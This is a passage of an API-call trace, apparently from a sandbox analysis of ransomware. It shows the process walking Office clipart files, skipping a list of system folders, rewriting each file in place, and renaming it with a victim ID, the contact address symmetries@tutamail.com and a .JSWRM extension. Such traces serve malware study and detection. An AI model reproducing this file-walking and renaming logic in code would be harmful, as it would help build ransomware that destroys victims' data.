[0074.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0074.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0074.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0074.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.464] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0074.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.464] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD06102_.WMF", cAlternateFileName="")) returned 1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2=".") returned 1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="..") returned 1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="...") returned 1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="windows") returned -1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="recovery") returned -1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="perflogs") returned -1 [0074.464] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="documents and settings") returned -1 [0074.465] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.465] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="system volume information") returned -1 [0074.465] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="msocache") returned -1 [0074.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06102_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06102_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD06102_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0074.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06102_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06102_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD06102_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.465] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.465] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.465] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16112) returned 1 [0074.465] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ef0) returned 0x24c1d0 [0074.465] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3ef0, lpOverlapped=0x0) returned 1 [0074.468] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.468] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3ef0, lpOverlapped=0x0) returned 1 [0074.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.468] CloseHandle (hObject=0x460) returned 1 [0074.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0074.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0074.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0074.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0074.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0074.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0074.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.469] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD06200_.WMF", cAlternateFileName="")) returned 1 [0074.469] lstrcmpiW (lpString1="BD06200_.WMF", lpString2=".") returned 1 [0074.469] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="..") returned 1 [0074.469] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="...") returned 1 [0074.469] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="windows") returned -1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="recovery") returned -1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="perflogs") returned -1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="documents and settings") returned -1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="system volume information") returned -1 [0074.470] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="msocache") returned -1 [0074.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06200_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD06200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0074.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06200_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD06200_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD06200_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.470] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16676) returned 1 [0074.470] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4120) returned 0x24c1d0 [0074.470] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x4120, lpOverlapped=0x0) returned 1 [0074.473] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.473] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x4120, lpOverlapped=0x0) returned 1 [0074.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.473] CloseHandle (hObject=0x460) returned 1 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0074.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0074.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0074.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0074.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0074.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0074.474] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06200_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06200_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0074.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.474] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x687c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD07761_.WMF", cAlternateFileName="")) returned 1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2=".") returned 1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="..") returned 1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="...") returned 1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="windows") returned -1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="recovery") returned -1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="perflogs") returned -1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="documents and settings") returned -1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.474] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="system volume information") returned -1 [0074.475] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="msocache") returned -1 [0074.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07761_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07761_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07761_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0074.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07761_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BD07761_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BD07761_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0074.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.534] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26748) returned 1 [0074.534] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6870) returned 0x24c1d0 [0074.534] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6870, lpOverlapped=0x0) returned 1 [0074.537] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.537] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6870, lpOverlapped=0x0) returned 1 [0074.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.537] CloseHandle (hObject=0x460) returned 1 [0074.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0074.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0074.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07761_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07761_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.538] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BD07804_.WMF", cAlternateFileName="")) returned 1 [0074.538] lstrcmpiW (lpString1="BD07804_.WMF", lpString2=".") returned 1 [0074.538] lstrcmpiW 